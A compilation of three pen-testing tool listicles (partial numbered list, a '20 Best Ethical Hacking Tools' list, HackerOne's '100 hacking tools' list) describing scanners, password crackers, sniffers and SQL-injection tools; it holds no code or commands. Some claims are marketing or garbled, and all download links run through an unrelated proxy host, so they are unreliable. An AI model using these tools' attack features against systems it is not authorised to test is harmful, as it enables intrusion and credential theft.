button, providing an overview of your network’s vulnerabilities. The pen test
application scans for open ports, weak passwords, and misconfiguration errors.

Benefits:
 Ideal for locating and identify missing patches as well as malware.
 The system only has .32 defects per every 1 million scans.
 You can create customized reports, including types of vulnerabilities by plugin or
host.
 In addition to web application, mobile scanning, and cloud environment, the tool
offers priority remediation.

12. Kali Linux

 Kali Linux advanced penetration testing software is a Linux distribution used for
penetration testing. Many experts believe this is the best tool for both injecting and
password snipping. However, you will need skills in both TCP/IP protocol to gain the
most benefit. An open-source project, Kali Linux, provides tool listings, version
tracking, and meta-packages.

Benefits:
 With 64 bit support, you can use this tool for brute force password cracking.
 Kali uses a live image loaded into the RAM to test the security skills of ethical
hackers.
 Kali has over 600 ethical hacking tools.
 Various security tools for vulnerability analysis, web applications, information
gathering, wireless attacks, reverse engineering, password cracking, forensic tools,
web applications, spoofing, sniffing, exploitation tools, and hardware hacking are
available.
 Easy integration with other penetration testing tools, including Wireshark and
Metasploit.
 The BackTrack provides tools for WLAN and LAN vulnerability assessment
scanning, digital forensics, and sniffing.

13. SQLmap
SQLmap is an SQL injection takeover tool for databases. Supported database
platforms include MySQL, SQLite, Sybase, DB2, Access, MSSQL, PostgreSQL.
SQLmap is open-source and automates the process of exploiting database servers and
SQL injection vulnerabilities.

Benefits:
 Detects and maps vulnerabilities.
 Provides support for all injection methods: Union, Time, Stack, Error, Boolean.
 Runs software at the command line and can be downloaded for Linux, Mac OS, and
Windows systems

14. (SET) Social Engineer Toolkit

Social engineering is the primary focus of the toolkit. Despite the aim and focus,
human beings are not the target of the vulnerability scanner.

Benefits:
 It has been featured at top cybersecurity conferences, including ShmooCon, Defcon,
DerbyCon and is an industry-standard for penetration tests.
 SET has been downloaded over 2 million times.
 An open-source testing framework designed for social engineering detection.

15. Zed Attack Proxy

OWASP ZAP (Zed Attack Proxy) is part of the free OWASP community. It is ideal
for developers and testers that are new to penetration testing. The project started in
2010 and is improved daily. ZAP runs in a cross-platform environment creating a
proxy between the client and your website.

Benefits:
 4 modes available with customizable options.
 To install ZAP, JAVA 8+ is required on your Windows or Linux system.
 The help section is comprehensive with a Getting Started (PDF), Tutorial, User
Guide, User Groups, and StackOverflow.
 Users can learn all about Zap development through Source Code, Wiki, Developer
Group, Crowdin, OpenHub, and BountySource.

16. Wapiti
Wapiti is an application security tool that allows black box testing. Black box testing
checks web applications for potential liabilities. During the black box testing process,
web pages are scanned, and the testing data is injected to check for any lapses in
security.
 Experts will find ease-of-usability with the command-line application.
 Wapiti identifies vulnerabilities in file disclosure, XSS Injection, Database injection,
XXE injection, Command Execution detection, and easily bypassed
compromised .htaccess configurations.

17. Cain & Abel

Cain & Abel is ideal for procurement of network keys and passwords through
penetration. The tool makes use of network sniffing to find susceptibilities.
 The Windows-based software can recover passwords using network sniffers,
cryptanalysis attacks, and brute force.
Excellent for recovery of lost passwords.
20 Best Ethical Hacking Tools & Software for
Hackers (2020)
What are Hacking Tools?
Hacking Tools are computer programs and scripts that help you find and exploit
weaknesses in computer systems, web applications, servers and networks. There are a
variety of such tools available in the market. Users can easily download hack tools for
ethical hacking. Some of them are open source while others are commercial solution.

Following is a handpicked list of Top 20 Best Ethical Hacking Tools, with their
popular features and website links to download hack tools. The list contains top
hacking tools both open source(free) and commercial(paid).

Top Hacking Tools, Programs & Software Downloads

Name Platform Link
Netsparker Windows, Linux Learn More
Acunetix Windows, Linux, Mac Learn More
Traceroute NG Windows Learn More

1) Netsparker

Netsparker is an easy to use web application security scanner that can automatically
find SQL Injection, XSS and other vulnerabilities in your web applications and web
services. It is available as on-premises and SAAS solution.

Features

 Dead accurate vulnerability detection with the unique Proof-Based Scanning

Technology.
 Minimal configuration required. Scanner automatically detects URL rewrite
rules, custom 404 error pages.
 REST API for seamless integration with the SDLC, bug tracking systems etc.
 Fully scalable solution. Scan 1,000 web applications in just 24 hours.
2) Acunetix
Acunetix is a fully automated ethical hacking solution that mimics a hacker to keep
one step ahead of malicious intruders. The web application security scanner accurately
scans HTML5, JavaScript and Single-page applications. It can audit complex,
authenticated webapps and issues compliance and management reports on a wide
range of web and network vulnerabilities.

Features:

 Scans for all variants of SQL Injection, XSS, and 4500+ additional
vulnerabilities
 Detects over 1200 WordPress core, theme, and plugin vulnerabilities
 Fast & Scalable – crawls hundreds of thousands of pages without interruptions
 Integrates with popular WAFs and Issue Trackers to aid in the SDLC
 Available On Premises and as a Cloud solution.
What is Database SQL

3) Traceroute NG
Traceroute NG is application that enables you to analyze network path. This software
can identify IP addresses, hostnames, and packet loss. It provides accurate analysis
through command line interface

Features:

 It offers both TCP and ICMP network path analysis.

 This application can create a txt logfile.
 Supports both IP4 and IPV6.
 Detect path changes and give you a notification.
 Allows continuous probing of a network.
4) SaferVPN
SaferVPN is an indispensable tool in an Ethical hackers arsenal. You may need it to
check target in different geographies, simulate nonpersonalized browsing behavior,
anonymized file transfers, etc.

Features:

 No Log VPN with high security and anonymity

 Very fast speeds with 2000+ servers across continents
 Based in Hongkong, it does not store any data.
 Split tunneling and 5 simultaneous logins
 24/7 support
 Supports Windows, Mac, Android, Linux, iPhone, etc.
 300,000+ IPs
 Port Forwarding, Dedicated IO and P2P Protection
 31 Day Money-Back Guarantee

5) Burp Suite:

Burp Suite is a useful platform for performing Security Testing of web applications.
Its various hacker tools work seamlessly together to support the entire pen testing
process. It spans from initial mapping to analysis of an application's attack surface.

Features:

It is one of the best hacking tools that can detect over 3000 web application
vulnerabilities.
  Scan open-source software and custom-built applications
 An easy to use Login Sequence Recorder allows the automatic scanning
 Review vulnerability data with built-in vulnerability management.
 Easily provide wide variety of technical and compliance reports
 Detects Critical Vulnerabilities with 100% Accuracy
 Automated crawl and scan
 It is one of the best hackers tools which provides advanced scanning feature for
manual testers
 Cutting-edge scanning logic

Download link: https://portswigger.net/burp/freedownload

6) Ettercap:

Ettercap is an ethical hacking tool. It supports active and passive dissection includes
features for network and host analysis.

Features:

 It is one of the best hacker tools that supports active and passive dissection of
many protocols
 Feature of ARP poisoning to sniff on a switched LAN between two hosts
 Characters can be injected into a server or to a client while maintaining a live
connection
 Ettercap is capable of sniffing an SSH connection in full duplex
 It is one of the best hackers tools that allows sniffing of HTTP SSL secured
data even when the connection is made using proxy
 Allows creation of custom plugins using Ettercap's API

Download link: https://ettercap.github.io/ettercap/downloads.html

7) Aircrack:
Aircrack is one of the best, trustable, ethical hacking tools in the market. It cracks
vulnerable wireless connections. It is powered by WEP WPA and WPA 2 encryption
Keys.

Features:

 More cards/drivers supported

 Support all types of OS and platforms
 New WEP attack: PTW
 Support for WEP dictionary attack
 Support for Fragmentation attack
 Improved tracking speed

Download link: https://www.aircrack-ng.org/downloads.html

8) Angry IP Scanner:

Angry IP Scanner is open-source and cross-platform ethical hacking tool. It scans IP

addresses and ports.

Features:

 This network hacking tool scans local networks as well as the Internet
 Free and open-source hack tool
 Random or file in any format
 Exports results into many formats
 Extensible with many data fetchers
 Provides command-line interface
 This hacking software works on Windows, Mac, and Linux
 No need for Installation

Download link: http://angryip.org/download/#windows

9) GFI LanGuard:
GFI LanGuard is an ethical tool that scan networks for vulnerabilities. It can acts as
your 'virtual security consultant' on demand. It allows creating an asset inventory of
every device.

Features:

 It helps to maintain a secure network over time is to know which changes are
affecting your network and
 Patch management: Fix vulnerabilities before an attack
 Analyze network centrally
 Discover security threats early
 Reduce cost of ownership by centralizing vulnerability scanning
 Help to maintain a secure and compliant network

Download link: https://www.gfi.com/products-and-solutions/network-security-

solutions/gfi-languard/download

10) Savvius:

It is one of the best hacking tools for ethical hacking. It performance issues and
reduces security risk with the deep visibility provided by Omnipeek. It can diagnose
network issues faster and better with Savvius packet intelligence.

Features:

 Powerful, easy-to-use network forensics software

 Savvius automates the capture of the network data required to quickly
investigate security alerts
 Software and integrated appliance solutions
 Packet intelligence combines deep analysis
 This network hacking tool provides rapid resolution of network and security
issues
 Easy to use Intuitive workflow
 Expert and responsive technical support
 Onsite deployment for appliances
  Commitment to our customers and our products

Download link: https://www.savvius.com/distributed_network_analysis_suite_trial

11) QualysGuard:

Qualys guard helps businesses streamline their security and compliance solutions. It
also builds security into their digital transformation initiatives. It is one of the best
hacker tools that checks the performance vulnerability of the online cloud systems.

Features:

 It is one of the best online hacking tools which is trusted globally

 No hardware to buy or manage
 It is a scalable, end-to-end solution for all aspects of IT security
 Vulnerability data securely stored and processed on an n-tiered architecture of
load-balanced servers
 It sensor provides continuous visibility
 Data analyzed in real time
 It can respond to threats in a real-time

Download link: https://www.qualys.com/forms/freescan/

12) WebInspect:

WebInspect is automated dynamic application security testing that allows performing

ethical hacking techniques. It is one of the best hacking tools which provides
comprehensive dynamic analysis of complex web applications and services.

Features:

 Allows to test dynamic behavior of running web applications to identify

security vulnerabilities
  Keep in control of your scan by getting relevant information and statistics at a
glance
 Centralized Program Management
 Advanced technologies, such as simultaneous crawl professional-level testing
to novice security testers
 Easily inform management on vulnerability trending, compliance management,
and risk oversight

Download link: https://www.microfocus.com/en-us/products/webinspect-dynamic-

analysis-dast/how-it-works

13) Hashcat:

Hashcat is one of the best robust password cracking and ethical hacker tools. It can
help users to recover lost passwords, audit password security, or just find out what
data is stored in a hash.

Features:

 Open-Source platform
 Multi-Platform Support
 This hacking software allows utilizing multiple devices in the same system
 Utilizing mixed device types in the same system
 It supports distributed cracking networks
 Supports interactive pause/resume
 Supports sessions and restore
 Built-in benchmarking system
 Integrated thermal watchdog
 Supports automatic performance tuning

Download link: https://hashcat.net/hashcat/

14) L0phtCrack:
L0phtCrack 6 is useful password audit and recovery tool. It identifies and assesses
password vulnerability over local machines and networks.

Features:

 Multicore & multi-GPU support helps to optimize hardware

 Easy to customize
 Simple Password Loading
 Schedule sophisticated tasks for automated enterprise-wide password
 Fix weak passwords issues by forcing password resets or locking accounts
 It allows multiple auditing OSes

Download link: http://www.l0phtcrack.com/#download-form

15) Rainbow Crack:

RainbowCrack RainbowCrack is a password cracking and ethical hacking tool widely
used for hacking devices. It cracks hashes with rainbow tables. It uses time-memory
tradeoff algorithm for this purpose.

Features:

 Full time-memory trade-off tool suites, including rainbow table generation

 It Support rainbow table of any hash algorithm
 Support rainbow table of any charset
 Support rainbow table in raw file format (.rt) and compact file format
 Computation on multi-core processor support
 GPU acceleration with multiple GPUs
 Runs on Windows OS and Linux
 Unified rainbow table file format on every supported OS
 Command line user interface
 Graphics user interface

Download link: http://project-rainbowcrack.com/index.htm

16) IKECrack:
IKECrack is an open source authentication crack tool. This ethical hacking tool is
designed to brute-force or dictionary attack. It is one of the best hacker tools that
allows performing cryptography tasks.

Features:

 IKECrack is a tool that allows performing Cryptography tasks

 Initiating client sends encryption options proposal, DH public key, random
number, and an ID in an unencrypted packet to the gateway/responder.
 It is one of the best hacking programs freely available for both personal and
commercial use. Therefore, it is perfect choice for user who wants an option for
Cryptography programs

Download link: http://ikecrack.sourceforge.net/

17) IronWASP:

IronWASP is an open source hacking software. It is web application vulnerability

testing. It is designed to be customizable so that users can create their custom security
scanners using it.

Features:

 GUI based and very easy to use

 It has powerful and effective scanning engine
 Supports for recording Login sequence
 Reporting in both HTML and RTF formats
 It is one of the best hacking programs that checks for over 25 types of web
vulnerabilities
 False Positives and Negatives detection support
 It supports Python and Ruby
 Extensible using plug-ins or modules in Python, Ruby, C# or VB.NET

Download link: https://sboxr.com/download.html

18) Medusa
Medusa is one of the best online brute-force, speedy, parallel password crackers
ethical hacking tool. This hacking toolkit is also widely used for ethical hacking.

Features:

 It is designed in such a way that it is speedy, massively parallel, modular, login

brute-forcer
 The main aim of this hacking software is to support as many services which
allow remote authentication
 It is one of the best online hacking tools that allows to perform Thread-based
parallel testing and Brute-force testing
 Flexible user input. It can be specified in a variety of ways
 All the service module exists as an independent .mod file.
 No modifications are needed to the core application to extend the supported list
of services for brute-forcing

Download link: http://foofus.net/goons/jmk/medusa/medusa.html

19) NetStumbler

NetStumbler is a hacking software used to detect wireless networks on the Windows

platform.

Features:

 Verifying network configurations

 Finding locations with poor coverage in a WLAN
 Detecting causes of wireless interference
 Detecting unauthorized ("rogue") access points
 Aiming directional antennas for long-haul WLAN links

Download link: http://www.stumbler.net/

20) SQLMap

SQLMap automates the process of detecting and exploiting SQL Injection

weaknesses. It is open source and cross platform. It supports the following database
engines.

 MySQL
 Oracle
 Postgre SQL
 MS SQL Server
 MS Access
 IBM DB2
 SQLite
 Firebird
 Sybase and SAP MaxDB

It supports the following SQL Injection Techniques;

 Boolean-based blind
 Time-based blind
 Error-based
 UNION query
 Stacked queries and out-of-band.

Download link: http://sqlmap.org/

21) Cain & Abel

Cain & Abel is a Microsoft Operating System passwords recovery tool. It is used to -

 Recover MS Access passwords

 Uncover password field
 Sniffing networks
 Cracking encrypted passwords using dictionary attacks, brute-force, and
cryptanalysis attacks.
Download link: http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-
and-Abel.shtml

22) Nessus

Nessus can be used to perform;

 Remote vulnerability scanner

 Password dictionary attacks
 Denial of service attacks.

It is closed source, cross platform and free for personal use.

Download link: https://www.tenable.com/products/nessus/nessus-professional

23) Zenmap

Zenmap is the official Nmap Security Scanner software. It is a multi-platform free and
open source application. It is easy to use for beginners but also offers advanced
features for experienced users.

Features:

 Interactive and graphical results viewing

 It summarizes details about a single host or a complete scan in a convenient
display.
  It can even draw a topology map of discovered networks.
 It can show the differences between two scans.
 It allows administrators to track new hosts or services appearing on their
networks. Or track existing services that go down

Download link: https://nmap.org/download.html

100 HACKING TOOLS AND

RESOURCES
 H AC KE R R E S O U R C E S
 H AC KE R 1 0 1
May 29, 2020 | HackerOne
As we recently surpassed $100 million dollars in bounties, we want to continue the celebration
with this list of 100 tools and resources for hackers! These range from beginner to expert. Most
are free but some cost money. Check them out to add to your own hacking toolkit! We’ll add
these to our GitHub on Hacker101/_resources/ so feel free to continue adding even more tools
and resources!

Burp Suite
1. Burp Suite: The quintessential web app hacking tool. Once you hit 500 reputation on
HackerOne, you are eligible for a free 3-month license of Burp Suite Pro! Check out these
awesome Burp plugins:
2. ActiveScan++: ActiveScan++ extends Burp Suite's active and passive scanning capabilities.
Designed to add minimal network overhead, it identifies application behavior that may be of
interest to advanced testers.
3. BurpSentinel: With BurpSentinel it is possible for the penetration tester to quickly and easily
send a lot of malicious requests to parameters of a HTTP request. Not only that, but it also shows
a lot of information of the HTTP responses, corresponding to the attack requests. It's easy to find
low-hanging fruit and hidden vulnerabilities like this, and it also allows the tester to focus on
more important stuff!
4. Autorepeater Burp: Automated HTTP request repeating with Burp Suite.
5. Autorize Burp: Autorize is an extension aimed at helping the penetration tester to detect
authorization vulnerabilities—one of the more time-consuming tasks in a web application
penetration test.
6. Burp Beautifier: BurpBeautifier is a Burpsuite extension for beautifying request/response
body, supporting JS, JSON, HTML, XML format, writing in Jython 2.7.
7. Flow: This extension provides a Proxy history-like view along with search filter capabilities
for all Burp tools.
8. Headless Burp: This extension allows you to run Burp Suite's Spider and Scanner tools in
headless mode via the command-line.
9. Logger++: Logger++ is a multi-threaded logging extension for Burp Suite. In addition to
logging requests and responses from all Burp Suite tools, the extension allows advanced filters to
be defined to highlight interesting entries or filter logs to only those which match the filter.
10. WSDL Wizard: This extension scans a target server for WSDL files. After performing
normal mapping of an application's content, right click on the relevant target in the site map, and
choose "Scan for WSDL files" from the context menu. The extension will search the already
discovered contents for URLs with the .wsdl file extension, and guess the locations of any
additional WSDL files based on the file names known to be in use. The results of the scanning
appear within the extension's output tab in the Burp Extender tool.
11. JSON_Beautifier: This plugin provides a JSON tab with beautified representation of the
request/response.
Web Hacking
12. JSParser: A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from
JavaScript files. This is especially useful for discovering AJAX requests when performing
security research or bug bounty hunting.
13. Knockpy: Knockpy is a python tool designed to enumerate subdomains on a target domain
through a word list. It is designed to scan for a DNS zone transfer and bypass the wildcard DNS
record automatically, if it is enabled. Knockpy now supports queries to VirusTotal subdomains,
you can set the API_KEY within the config.json file.
14. Lazys3: A Ruby script to brute-force for AWS s3 buckets using different permutations.
15. Sublist3r: Sublist3r is a python tool designed to enumerate subdomains of websites using
OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the
domain they are targeting. Sublist3r enumerates subdomains using many search engines such as
Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft,
Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS.
16. Teh_s3_bucketeers: Teh_s3_bucketeers is a security tool to discover S3 buckets on
Amazon's AWS platform.
17. Virtual-host-discovery: This is a basic HTTP scanner that enumerates virtual hosts on a given
IP address. During recon, this might help expand the target by detecting old or deprecated code.
It may also reveal hidden hosts that are statically mapped in the developer's /etc/hosts file.
18. Wpscan: WPScan is a free (for non-commercial use) black box WordPress security scanner
written for security professionals and bloggers to test the security of their sites.
19. Webscreenshot: A simple script to screenshot a list of websites, based on the url-to-image
PhantomJS script.
20. Asnlookup: The ASN Information tool displays information about an IP address's
Autonomous System Number (ASN), such as: IP owner, registration date, issuing registrar and
the max range of the AS with total IPs.
21. Unfurl: Unfurl is a tool that analyzes large collections of URLs and estimates their entropies
to sift out URLs that might be vulnerable to attack.
22. Waybackurls: Accept line-delimited domains on stdin, fetch known URLs from the Wayback
Machine for *.domain and output them on stdout.
23. Httprobe: Takes a list of domains and probes for working http and https servers.
24. Meg: Meg is a tool for fetching lots of URLs without taking a toll on the servers. It can be
used to fetch many paths for many hosts, or fetching a single path for all hosts before moving on
to the next path and repeating.
25. Gau: Getallurls (gau) fetches known URLs from AlienVault's Open Threat Exchange, the
Wayback Machine, and Common Crawl for any given domain. Inspired by Tomnomnom's
waybackurls.
26. Ffuf: A fast web fuzzer written in Go.
27. Dirsearch: A simple command line tool designed to brute force directories and files in
websites.
28. OWASP Zed: OWASP Zed Attack Proxy (ZAP) is an open source tool which is offered by
OWASP (Open Web Application Security Project), for penetration testing of your website/web
application. It helps you find the security vulnerabilities in your application.
29. Subfinder: Subfinder is a subdomain discovery tool that discovers valid subdomains for
websites by using passive online sources. It has a simple modular architecture and is optimized
for speed. Subfinder is built for doing one thing only - passive subdomain enumeration, and it
does that very well.
30. EyeWitnees: EyeWitness is designed to take screenshots of websites, provide some server
header info, and identify any default credentials. EyeWitness is designed to run on Kali Linux. It
will auto detect the file you give it with the -f flag as either being a text file with URLs on each
new line, nmap xml output, or nessus xml output. The --timeout flag is completely optional, and
lets you provide the max time to wait when trying to render and screenshot a web page.
31. Nuclei: Nuclei is a fast tool for configurable targeted scanning based on templates offering
massive extensibility and ease of use.
32. Naabu: Naabu is a port scanning tool written in Go that allows you to enumerate valid ports
for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN scans on the
host/list of hosts and lists all ports that return a reply.
33. Shuffledns: ShuffleDNS is a wrapper around massdns written in go that allows you to
enumerate valid subdomains using active bruteforce, as well as resolve subdomains with
wildcard handling and easy input-output support.
34. Dnsprobe: DNSProbe is a tool built on top of retryabledns that allows you to perform
multiple dns queries of your choice with a list of user supplied resolvers.
35. Chaos: Chaos actively scans and maintains internet-wide assets' data. This project is meant to
enhance research and analyze changes around DNS for better insights.
36. Subjack: Subjack is a Subdomain Takeover tool written in Go designed to scan a list of
subdomains concurrently and identify ones that are able to be hijacked. With Go's speed and
efficiency, this tool really stands out when it comes to mass-testing. Always double check the
results manually to rule out false positives.
37. gitGraber: gitGraber is a tool developed in Python3 to monitor GitHub to search and find
sensitive data in real time for different online services.
38. Shhgit: Shhgit finds secrets and sensitive files across GitHub code and Gists committed in
nearly real-time by listening to the GitHub Events API.
39. Commit-stream: Commit-stream extracts commit logs from the Github event API, exposing
the author details (name and email address) associated with Github repositories in real time.
40. Masscan: This is an Internet-scale port scanner. It can scan the entire Internet in under 6
minutes, transmitting 10 million packets per second, all from a single machine.
41. Massdns: MassDNS is a simple high-performance DNS stub resolver targeting those who
seek to resolve a massive amount of domain names in the order of millions or even billions.
Without special configuration, MassDNS is capable of resolving over 350,000 names per second
using publicly available resolvers.
42. Findomain: Findomain offers a dedicated monitoring service hosted in Amazon (only the
local version is free), that allows you to monitor your target domains and send alerts to Discord
and Slack webhooks or Telegram chats when new subdomains are found.
43. Amass: The OWASP Amass Project performs network mapping of attack surfaces and
external asset discovery using open source information gathering and active reconnaissance
techniques.
44. Dnsgen: This tool generates a combination of domain names from the provided input.
Combinations are created based on wordlist. Custom words are extracted per execution.
45. Dngrep: A utility for quickly searching presorted DNS names. Built around the Rapid7 rdns
& fdns dataset.
46. Wfuzz: Wfuzz has been created to facilitate the task in web applications assessments and it is
based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a
given payload.
47. Aquatone: Aquatone is a tool for visual inspection of websites across a large number of
hosts, which provides a convenient overview of HTTP-based attack surface.
48. WhatWeb: WhatWeb recognizes web technologies including content management systems
(CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and
embedded devices. WhatWeb has over 1800 plugins, each to recognise something different.
WhatWeb also identifies version numbers, email addresses, account IDs, web framework
modules, SQL errors, and more.
49. Dirb: ‘DIRB is a web content scanner. It launches a dictionary based attack against a web
server and analyzes the response.
50. Dnscan: Dnscan is a python wordlist-based DNS subdomain scanner.
51. Sublert: Sublert is a security and reconnaissance tool that was written in Python to leverage
certificate transparency for the sole purpose of monitoring new subdomains deployed by specific
organizations and an issued TLS/SSL certificate. The tool is supposed to be scheduled to run
periodically at fixed times, dates, or intervals (Ideally each day). New identified subdomains will
be sent to Slack workspace with a notification push. Furthermore, the tool performs DNS
resolution to determine working subdomains.
52. Recon-ng: Recon-ng is a full-featured reconnaissance framework designed with the goal of
providing a powerful environment to conduct open source, web-based reconnaissance quickly
and thoroughly.
53. Jok3r: Jok3r is a framework that helps penetration testers with network infrastructure and
web security assessments. Its goal is to automate as much as possible in order to quickly identify
and exploit "low-hanging fruit" and "quick win" vulnerabilities on most common TCP/UDP
services and most common web technologies (servers, CMS, languages...).
54. DirBuster: This tool is a multi-threaded java application that is used to perform brute force
over directories and file names on web and application servers. DirBuster attempts to find hidden
directories and pages within a web application, providing users with an additional attack vector.
55. Altdns: Altdns is a DNS recon tool that allows for the discovery of subdomains that conform
to patterns. Altdns takes in words that could be present in subdomains under a domain (such as
test, dev, staging), as well as a list of known subdomains.
56. Recon_profile: This tool is to help create easy aliases to run via an SSH/terminal.
57. BBHT: Bug Bounty Hunting Tools is a script to install the most popular tools used while
looking for vulnerabilities for a bug bounty program.
Mobile Hacking
58. MobSF: Mobile Security Framework (MobSF) is an automated, all-in-one mobile application
(Android/iOS/Windows) pen-testing, malware analysis and security assessment framework
capable of performing static and dynamic analysis.
59. Jadx: Jadx is a dex to Java decompiler. The command line and GUI tools for producing Java
source code from Android Dex and Apk files.
60. Dex2Jar: Dex2Jar is a freely available tool to work with Android “. dex” and Java “. class”
files.
61. Radare2: A free/libre toolchain for easing several low level tasks, such as forensics, software
reverse engineering, exploiting, debugging, etc. It is composed by a large number of libraries
(which are extended with plugins) and programs that can be automated with almost any
programming language.
62. Genymotion: Cross-platform Android emulator for developers & QA engineers. Develop &
automate your tests to deliver best quality apps.
63. Frida "Universal" SSL Unpinner: Universal unpinner.
64. Frida: Dynamic instrumentation toolkit for developers, reverse-engineers, and security
researchers.
Exploitation
65. SQLNinja: Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web
application that uses Microsoft SQL Server as its back-end.
66. XSS hunter: XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities,
including the often-missed blind XSS. The service works by hosting specialized XSS probes
which, upon firing, scan the page and send information about the vulnerable page to the XSS
Hunter service.
67. NoSQLMap: NoSQLMap is an open source Python tool designed to audit for, as well as
automate injection attacks, and exploit default configuration weaknesses in NoSQL databases
and web applications using NoSQL to disclose or clone data from the database.
68. Ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object
deserialization.
69. Sqlmap: Sqlmap is an open-source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over database servers. It comes with a
powerful detection engine, many niche features for the ultimate penetration tester, and a broad
range of switches including database fingerprinting, over data fetching from the database,
accessing the underlying file system, and executing commands on the operating system via out-
of-band connections.
70. SSRFTest: SSRF testing tool.
71. Retire.JS: Scanning website for vulnerable js libraries.
72. Spiderfoot: SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates
with just about every data source available, and automates OSINT collection so that you can
focus on data analysis.
Scanners/Frameworks
73. OpenVAS: OpenVAS is a full-featured vulnerability scanner. Its capabilities include
unauthenticated testing, authenticated testing, various high level and low-level Internet and
industrial protocols, performance tuning for large-scale scans and a powerful internal
programming language to implement any type of vulnerability test.
74. Nikto: Nikto is an Open Source (GPL) web server scanner which performs comprehensive
tests against web servers for multiple items, including over 6700 potentially dangerous
files/programs, checks for outdated versions of over 1250 servers, and version specific problems
on over 270 servers.
75. Wapiti: Wapiti allows you to audit the security of your websites or web applications. It
performs "black-box" scans (it does not study the source code) of the web application by
crawling the web pages of the deployed webapp, looking for scripts and forms where it can inject
data.
76. Metasploit: Metasploit is an open-source penetration testing framework.
77. Maltego: Maltego is an open source intelligence (OSINT) and graphical link analysis tool for
gathering and connecting information for investigative tasks.
78. Canvas: CANVAS offers hundreds of exploits, an automated exploitation system, and a
comprehensive, reliable exploit development framework to penetration testers and security
professionals worldwide.
79. Sn1per: Sn1per Community Edition is an automated scanner that can be used during a
penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's
premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and
Corporate Security teams to manage large environments and pentest scopes.
80. Lazyrecon: LazyRecon is a script written in Bash, intended to automate the tedious tasks of
reconnaissance and information gathering. The information is organized in an html report at the
end, which helps you identify next steps.
81. Osmedeus: Osmedeus allows you to automatically run the collection of awesome tools for
reconnaissance and vulnerability scanning against the target.
82. Reconness: ReconNess helps you to run and keep all your #recon in the same place allowing
you to focus only on the potentially vulnerable targets without distraction and without requiring a
lot of bash skill, or programming skill in general.
83. IronWASP: IronWASP (Iron Web Application Advanced Security testing Platform) is an
open-source tool used for web application vulnerability testing. It is designed in such a way that
users having the right knowledge can create their own scanners using this as a framework.
IronWASP is built using Python and Ruby and users having knowledge of them would be able to
make full use of the platform. However, IronWASP provides a lot of features that are simple to
understand.
84. Nmap: Nmap ("Network Mapper") is a free and open-source (license) utility for network
discovery and security auditing.
Datasets / Freemium Services
85. Shodan: Shodan provides a public API that allows other tools to access all of Shodan's data.
Integrations are available for Nmap, Metasploit, Maltego, FOCA, Chrome, Firefox and many
more.
86. Censys: Censys scans the most ports and houses the biggest certificate database in the world,
and provides the most up-to-date, thorough view of your known and unknown assets.
87. Rapid7 Forward DNS (FDNS): This dataset contains the responses to DNS requests for all
forward DNS names known by Rapid7's Project Sonar.
88. C99.nl: C99.nl is a scanner that scans an entire domain to find as many subdomains as
possible.
89. Seclists: SecLists is the security tester's companion. It's a collection of multiple types of lists
used during security assessments, collected in one place. List types include usernames,
passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The
goal is to enable a security tester to pull this repository onto a new testing box and have access to
every type of list that may be needed.
90. Payloads All The Things: A list of useful payloads and bypasses for Web Application
Security. Feel free to improve with your payloads and techniques.
Miscellaneous Hacking Tools
91. Ettercap: Ettercap is a comprehensive suite which features sniffing of live connections,
content filtering, and support for active and passive dissection of many protocols, including
multiple features for network and host analysis.
92. Transformations: Transformations makes it easier to detect common data obscurities, which
may uncover security vulnerabilities or give insight into bypassing defenses.
93. John the Ripper: John the Ripper is free and Open Source software, distributed primarily in a
source code form.
94. Wireshark: Wireshark® is a network protocol analyzer that lets you capture and interactively
browse the traffic running on a computer network.
95. Foxyproxy: FoxyProxy is an advanced proxy management tool that completely replaces
Firefox's limited proxying capabilities. For a simpler tool and less advanced configuration
options, please use FoxyProxy Basic.
96. Wappalyzer: Wappalyzer is a browser extension that uncovers the technologies used on
websites. It detects content management systems, eCommerce platforms, web servers, JavaScript
frameworks, analytics tools and many more.
97. Buildwith: BuiltWith's goal is to help developers, researchers and designers find out what
technologies web pages are using, which may help them decide what technologies to implement
themselves.
98. Altair: Altair GraphQL Client helps you debug GraphQL queries and implementations -
taking care of the hard part so you can focus on actually getting things done.
99. THC Hydra: This tool is a proof-of-concept code, designed to give researchers and security
consultants the possibility to show how easy it would be to gain unauthorized access from
remote to a system.
100. Swiftness X: A note taking tool for BB and pentesting.